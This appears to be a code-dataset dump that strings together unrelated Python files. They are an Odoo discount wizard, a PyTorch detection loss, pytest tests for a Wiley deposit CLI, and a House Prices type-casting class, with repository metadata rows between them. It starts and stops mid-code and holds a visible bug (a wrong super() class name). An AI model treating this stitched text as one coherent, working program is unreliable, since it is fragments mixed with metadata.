('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id','!=',False),
('tipo','!=','C')])
obj_detalle=self.env['descuento.alumno.detalle']
for datos in obj_datos:
cat_rep = self.env['res.partner'].search([('parent_id','=',datos.parent_id.id)])
dicct={}
lista=[]
if datos.parent_id:
if self.num_representados:
if len(cat_rep)==self.num_representados:
for descuentos in datos.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicct={
'descuento_id':self.id,
'jornada_id':datos.jornada_id.id,
'seccion_id':datos.seccion_id.id,
'curso_id':datos.curso_id.id,
'paralelo_id':datos.paralelo_id.id,
'alumno_id':datos.id,
'representante_id':datos.parent_id.id,
'colaborador':datos.parent_id.colaborador.id,
'cant_representados':len(cat_rep),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicct)
obj_registro.descuentos_ids=lista
else:
for descuentos in datos.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicct={
'descuento_id':self.id,
'jornada_id':datos.jornada_id.id,
'seccion_id':datos.seccion_id.id,
'curso_id':datos.curso_id.id,
'paralelo_id':datos.paralelo_id.id,
'alumno_id':datos.id,
'representante_id':datos.parent_id.id,
'colaborador':datos.parent_id.colaborador.id,
'cant_representados':len(cat_rep),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicct)
obj_registro.descuentos_ids=lista
else:
padres = self.env['res.partner'].search([('parent_id','=',datos.id)])
if self.num_representados:
if len(padres)==self.num_representados:
for dato in padres:
lista=[]
for descuentos in dato.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicc={
'descuento_id':self.id,
'jornada_id':dato.jornada_id.id,
'seccion_id':dato.seccion_id.id,
'curso_id':dato.curso_id.id,
'paralelo_id':dato.paralelo_id.id,
'alumno_id':dato.id,
'representante_id':dato.parent_id.id,
'colaborador':dato.parent_id.colaborador.id,
'cant_representados':len(padres),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicc)
obj_registro.descuentos_ids=lista
else:
for dato in padres:
lista=[]
for descuentos in dato.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicc={
'descuento_id':self.id,
'jornada_id':dato.jornada_id.id,
'seccion_id':dato.seccion_id.id,
'curso_id':dato.curso_id.id,
'paralelo_id':dato.paralelo_id.id,
'alumno_id':dato.id,
'representante_id':dato.parent_id.id,
'colaborador':dato.parent_id.colaborador.id,
'cant_representados':len(padres),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicc)
obj_registro.descuentos_ids=lista
self.consulto=True
@api.multi
def aplicar_descuento(self):
for lineas in self.descuento_line:
if lineas.aplicar:
obj_descuento = self.env['descuentos.tomar'].search([('partner_ids','=',lineas.alumno_id.id),('descuento_id','=',self.descuento_id.id)],limit=1)
if len(obj_descuento)==0:
obj_descuento = self.env['descuentos.tomar'].create({
'descuento_id':self.descuento_id.id,
'porcentaje':self.descuento_id.porcentaje,
'partner_ids':lineas.alumno_id.id
})
self.consultar_alumnos()
@api.multi
def des_aplicar_descuento(self):
for lineas in self.descuento_line:
if lineas.aplicar:
obj_descuento = self.env['descuentos.tomar'].search([('partner_ids','=',lineas.alumno_id.id),('descuento_id','=',self.descuento_id.id)],limit=1)
obj_descuento.unlink()
self.consultar_alumnos()
| 69
| 160
| 0.321251
| 2,136
| 31,947
| 4.583333
| 0.044007
| 0.069459
| 0.042901
| 0.072932
| 0.887028
| 0.874566
| 0.855975
| 0.837998
| 0.809806
| 0.809806
| 0
| 0.001649
| 0.563277
| 31,947
| 463
| 161
| 69
| 0.700043
| 0.000657
| 0
| 0.885321
| 0
| 0
| 0.112545
| 0.019201
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002294
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b5e44f8206d88f92a422f0935a4853bca594d841
| 7,746
|
py
|
Python
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 220
|
2019-10-14T01:08:46.000Z
|
2022-03-23T06:42:39.000Z
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 10
|
2019-10-16T07:40:04.000Z
|
2022-01-26T07:46:14.000Z
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 37
|
2019-10-22T01:49:36.000Z
|
2021-11-01T13:50:30.000Z
|
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
class cross_entropy_with_hnm_for_one_class_detection2(nn.Module):
def __init__(self, hnm_ratio, num_output_scales):
super(cross_entropy_with_hnm_for_one_class_detection, self).__init__()
self.hnm_ratio = int(hnm_ratio)
self.num_output_scales = num_output_scales
def forward(self, outputs, targets):
loss_branch_list = []
for i in range(self.num_output_scales):
pred_score = outputs[i * 2]
pred_bbox = outputs[i * 2 + 1]
gt_mask = targets[i * 2].cuda()
gt_label = targets[i * 2 + 1].cuda()
pred_score_softmax = torch.softmax(pred_score, dim=1)
# loss_mask = torch.ones(pred_score_softmax.shape[0],
# 1,
# pred_score_softmax.shape[2],
# pred_score_softmax.shape[3])
loss_mask = torch.ones(pred_score_softmax.shape)
if self.hnm_ratio > 0:
# print('gt_label.shape:', gt_label.shape)
# print('gt_label.size():', gt_label.size())
pos_flag = (gt_label[:, 0, :, :] > 0.5)
pos_num = torch.sum(pos_flag) # get num. of positive examples
if pos_num > 0:
neg_flag = (gt_label[:, 1, :, :] > 0.5)
neg_num = torch.sum(neg_flag)
neg_num_selected = min(int(self.hnm_ratio * pos_num), int(neg_num))
# non-negative value
neg_prob = torch.where(neg_flag, pred_score_softmax[:, 1, :, :], \
torch.zeros_like(pred_score_softmax[:, 1, :, :]))
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
else:
neg_choice_ratio = 0.1
neg_num_selected = int(pred_score_softmax[:, 1, :, :].numel() * neg_choice_ratio)
neg_prob = pred_score_softmax[:, 1, :, :]
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
# cross entropy with mask
pred_score_softmax_masked = pred_score_softmax[loss_mask]
pred_score_log = torch.log(pred_score_softmax_masked)
score_cross_entropy = -gt_label[:, :2, :, :][loss_mask] * pred_score_log
loss_score = torch.sum(score_cross_entropy) / score_cross_entropy.numel()
mask_bbox = gt_mask[:, 2:6, :, :]
if torch.sum(mask_bbox) == 0:
loss_bbox = torch.zeros_like(loss_score)
else:
predict_bbox = pred_bbox * mask_bbox
label_bbox = gt_label[:, 2:6, :, :] * mask_bbox
loss_bbox = F.mse_loss(predict_bbox, label_bbox, reduction='mean')
# loss_bbox = F.smooth_l1_loss(predict_bbox, label_bbox, reduction='mean')
# loss_bbox = torch.nn.MSELoss(predict_bbox, label_bbox, size_average=True, reduce=True)
# loss_bbox = torch.nn.SmoothL1Loss(predict_bbox, label_bbox, size_average=True, reduce=True)
loss_branch = loss_score + loss_bbox
loss_branch_list.append(loss_branch)
return loss_branch_list
class cross_entropy_with_hnm_for_one_class_detection(nn.Module):
def __init__(self, hnm_ratio, num_output_scales):
super(cross_entropy_with_hnm_for_one_class_detection, self).__init__()
self.hnm_ratio = int(hnm_ratio)
self.num_output_scales = num_output_scales
def forward(self, outputs, targets):
loss_cls = 0
loss_reg = 0
loss_branch = []
for i in range(self.num_output_scales):
pred_score = outputs[i * 2]
pred_bbox = outputs[i * 2 + 1]
gt_mask = targets[i * 2].cuda()
gt_label = targets[i * 2 + 1].cuda()
pred_score_softmax = torch.softmax(pred_score, dim=1)
# loss_mask = torch.ones(pred_score_softmax.shape[0],
# 1,
# pred_score_softmax.shape[2],
# pred_score_softmax.shape[3])
loss_mask = torch.ones(pred_score_softmax.shape)
if self.hnm_ratio > 0:
# print('gt_label.shape:', gt_label.shape)
# print('gt_label.size():', gt_label.size())
pos_flag = (gt_label[:, 0, :, :] > 0.5)
pos_num = torch.sum(pos_flag) # get num. of positive examples
if pos_num > 0:
neg_flag = (gt_label[:, 1, :, :] > 0.5)
neg_num = torch.sum(neg_flag)
neg_num_selected = min(int(self.hnm_ratio * pos_num), int(neg_num))
# non-negative value
neg_prob = torch.where(neg_flag, pred_score_softmax[:, 1, :, :], \
torch.zeros_like(pred_score_softmax[:, 1, :, :]))
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
else:
neg_choice_ratio = 0.1
neg_num_selected = int(pred_score_softmax[:, 1, :, :].numel() * neg_choice_ratio)
neg_prob = pred_score_softmax[:, 1, :, :]
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
# cross entropy with mask
pred_score_softmax_masked = pred_score_softmax[loss_mask]
pred_score_log = torch.log(pred_score_softmax_masked)
score_cross_entropy = -gt_label[:, :2, :, :][loss_mask] * pred_score_log
loss_score = torch.sum(score_cross_entropy) / score_cross_entropy.numel()
mask_bbox = gt_mask[:, 2:6, :, :]
if torch.sum(mask_bbox) == 0:
loss_bbox = torch.zeros_like(loss_score)
else:
predict_bbox = pred_bbox * mask_bbox
label_bbox = gt_label[:, 2:6, :, :] * mask_bbox
loss_bbox = F.mse_loss(predict_bbox, label_bbox, reduction='sum') / torch.sum(mask_bbox)
# loss_bbox = F.smooth_l1_loss(predict_bbox, label_bbox, reduction='sum') / torch.sum(mask_bbox)
# loss_bbox = torch.nn.MSELoss(predict_bbox, label_bbox, size_average=False, reduce=True)
# loss_bbox = torch.nn.SmoothL1Loss(predict_bbox, label_bbox, size_average=False, reduce=True)
loss_cls += loss_score
loss_reg += loss_bbox
loss_branch.append(loss_score)
loss_branch.append(loss_bbox)
loss = loss_cls + loss_reg
return loss, loss_branch
| 51.986577
| 112
| 0.565195
| 968
| 7,746
| 4.140496
| 0.105372
| 0.071856
| 0.095808
| 0.041916
| 0.926896
| 0.926896
| 0.926896
| 0.926896
| 0.907186
| 0.90519
| 0
| 0.018803
| 0.327137
| 7,746
| 149
| 113
| 51.986577
| 0.750192
| 0.158404
| 0
| 0.811321
| 0
| 0
| 0.001078
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.028302
| 0
| 0.103774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1fa51ee7b85c5f74c2211c6f46b1fbf6b9e5524a
| 109
|
py
|
Python
|
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | 1
|
2022-02-20T22:38:01.000Z
|
2022-02-20T22:38:01.000Z
|
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | null | null | null |
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | null | null | null |
from .main import VideoRandomZoom, VideoRandomContrast, VideoRandomCrop, VideoRandomFlip, VideoRandomRotation
| 109
| 109
| 0.889908
| 8
| 109
| 12.125
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06422
| 109
| 1
| 109
| 109
| 0.95098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1fa62f63ce644b35eadbf208d95cf3cf17194bd9
| 12,978
|
py
|
Python
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 2
|
2022-01-26T15:05:48.000Z
|
2022-01-31T17:28:47.000Z
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 10
|
2021-08-03T21:23:39.000Z
|
2022-02-10T15:24:12.000Z
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | null | null | null |
import logging
import boto3
from moto import mock_dynamodb2, mock_ses, mock_sqs
from awd.cli import cli, doi_to_be_added, doi_to_be_retried
logger = logging.getLogger(__name__)
def test_doi_to_be_added_true():
doi_items = [{"doi": "111.1/111"}]
validation_status = doi_to_be_added("222.2/2222", doi_items)
assert validation_status is True
def test_doi_to_be_added_false():
doi_items = [{"doi": "111.1/1111"}]
validation_status = doi_to_be_added("111.1/1111", doi_items)
assert validation_status is False
def test_doi_to_be_retried_true():
doi_items = [{"doi": "111.1/111", "status": "Failed, will retry"}]
validation_status = doi_to_be_retried("111.1/111", doi_items)
assert validation_status is True
def test_doi_to_be_retried_false():
doi_items = [{"doi": "111.1/111", "status": "Success"}]
validation_status = doi_to_be_retried("111.1/111", doi_items)
assert validation_status is False
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_deposit_success(
caplog, web_mock, s3_mock, s3_class, sqs_class, submission_message_body, runner
):
with caplog.at_level(logging.DEBUG):
sqs = boto3.resource("sqs", region_name="us-east-1")
sqs.create_queue(QueueName="mock-input-queue")
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_success.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
uploaded_metadata = s3_class.client.get_object(
Bucket="awd", Key="10.1002-term.3131.json"
)
assert uploaded_metadata["ResponseMetadata"]["HTTPStatusCode"] == 200
uploaded_bitstream = s3_class.client.get_object(
Bucket="awd", Key="10.1002-term.3131.pdf"
)
assert uploaded_bitstream["ResponseMetadata"]["HTTPStatusCode"] == 200
messages = sqs_class.receive(
"https://queue.amazonaws.com/123456789012/", "mock-input-queue"
)
for message in messages:
assert message["Body"] == submission_message_body
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_insufficient_metadata(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_insufficient_metadata.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert (
"Insufficient metadata for 10.1002/nome.tadata, missing title or URL"
in caplog.text
)
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_pdf_unavailable(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_pdf_unavailable.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert "A PDF could not be retrieved for DOI: 10.1002/none.0000" in caplog.text
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_s3_upload_failed(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"--doi_table",
"test_dois",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_success.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"not-a-bucket",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert "Upload failed: 10.1002-term.3131.json" in caplog.text
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_listen_success(
caplog,
sqs_class,
result_failure_message_attributes,
result_success_message_attributes,
result_failure_message_body,
result_success_message_body,
runner,
):
with caplog.at_level(logging.DEBUG):
sqs = boto3.resource("sqs", region_name="us-east-1")
sqs.create_queue(QueueName="mock-output-queue")
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
sqs_class.send(
"https://queue.amazonaws.com/123456789012/",
"mock-output-queue",
result_failure_message_attributes,
result_failure_message_body,
)
sqs_class.send(
"https://queue.amazonaws.com/123456789012/",
"mock-output-queue",
result_success_message_attributes,
result_success_message_body,
)
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Processing"},
"attempts": {"S": "1"},
},
)
dynamodb.put_item(
TableName="test_dois",
Item={
"doi": {"S": "222.2/2222"},
"status": {"S": "Processing"},
"attempts": {"S": "1"},
},
)
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--doi_table",
"test_dois",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"listen",
"--retry_threshold",
"10",
],
)
assert result.exit_code == 0
assert str(result_failure_message_body) in caplog.text
assert str(result_success_message_body) in caplog.text
assert "Messages received and deleted from output queue" in caplog.text
messages = sqs_class.receive(
"https://queue.amazonaws.com/123456789012/", "mock-output-queue"
)
assert next(messages, None) is None
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_listen_failure(caplog, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--doi_table",
"test_dois",
"--sqs_output_queue",
"non-existent",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"listen",
"--retry_threshold",
"10",
],
)
assert result.exit_code == 0
assert "Failure while retrieving SQS messages" in caplog.text
assert "Logs sent to" in caplog.text
| 35.075676
| 87
| 0.530282
| 1,300
| 12,978
| 5.048462
| 0.127692
| 0.030474
| 0.031083
| 0.031693
| 0.870181
| 0.852506
| 0.798568
| 0.776931
| 0.770075
| 0.757885
| 0
| 0.039742
| 0.342734
| 12,978
| 369
| 88
| 35.170732
| 0.72966
| 0
| 0
| 0.765896
| 0
| 0
| 0.282786
| 0.025659
| 0
| 0
| 0
| 0
| 0.098266
| 1
| 0.028902
| false
| 0
| 0.011561
| 0
| 0.040462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
952f524545dd592b1c3efe13c22b5c03db89b160
| 13,612
|
py
|
Python
|
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
from script.data_handler.Base.base_df_typecasting import base_df_typecasting
import pandas as pd
DF = pd.DataFrame
Series = pd.Series
def df_value_counts(df):
return [df[key].value_counts() for key in df]
def print_info(df, col_key, partial_df, series, Xs_keys, Ys_key):
print(col_key)
print(partial_df.info())
print(df_value_counts(partial_df))
print(f'unique count : {len(series.value_counts(ascending=True).keys().values)}')
print()
class HousePriceTypeCasting(base_df_typecasting):
def col_00_1stFlrSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_01_2ndFlrSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_02_3SsnPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_04_BedroomAbvGr(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_05_BldgType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_06_BsmtCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_07_BsmtExposure(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_08_BsmtFinSF1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_09_BsmtFinSF2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_10_BsmtFinType1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
self.to_str(df, col_key)
return df
def col_11_BsmtFinType2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_12_BsmtFullBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_13_BsmtHalfBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
